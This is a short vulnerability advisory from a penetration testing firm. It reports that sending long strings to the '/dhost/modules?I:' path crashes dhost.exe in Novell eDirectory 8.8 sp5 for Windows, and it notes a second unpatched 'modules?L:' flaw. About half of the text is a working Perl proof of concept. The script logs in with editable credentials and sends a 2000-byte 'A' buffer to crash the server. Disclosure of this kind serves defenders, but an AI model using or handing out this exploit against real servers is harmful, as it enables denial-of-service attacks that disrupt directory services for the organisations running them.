Product: Novell eDirectory 8.8 sp5 for Windows ******************************************************************************** Vulnerability: Denial of Service ******************************************************************************** Discussion: Vulnerability in '/dhost/modules?I:' Sending long strings to '/dhost/modules?I:' causes a DoS (crashing dhost.exe) Also in last weeks published another bug in 'modules?L:' It is not patched yet too.. ******************************************************************************** Credits: HACKATTACK IT SECURITY GmbH Penetration Testing in Deutschland - Österreich - Schweiz www.hackattack.com ******************************************************************************** Original Advisory www.hackattack.com ******************************************************************************** PoC: #!usr\bin\perl #Vulnerability has found by HACKATTACK use WWW::Mechanize; use LWP::Debug qw(+); use HTTP::Cookies; $address=$ARGV[0]; if(!$ARGV[0]){ print "Usage:perl $0 address\n"; exit(); } $login = "$address/_LOGIN_SERVER_"; $url = "$address/dhost/"; $module = "modules?I:"; $buffer = "A" x 2000; $vuln = $module.$buffer; #Edit the username and password. $user = "username"; $pass = "password"; #Edit the username and password. my $mechanize = WWW::Mechanize->new(); $mechanize->cookie_jar(HTTP::Cookies->new(file => "$cookie_file",autosave => 1)); $mechanize->timeout($url_timeout); $res = $mechanize->request(HTTP::Request->new('GET', "$login")); $mechanize->submit_form( form_name => "authenticator", fields => { usr => $user, pwd => $pass}, button => 'Login'); $response2 = $mechanize->get("$url$vuln"); About HACKATTACK ================ HACKATTACK IT SECURITY GmbH is a Penetrationtest and Security Auditing company located in Germany and Austria More Information about HACKATTACK at http://www.hackattack.com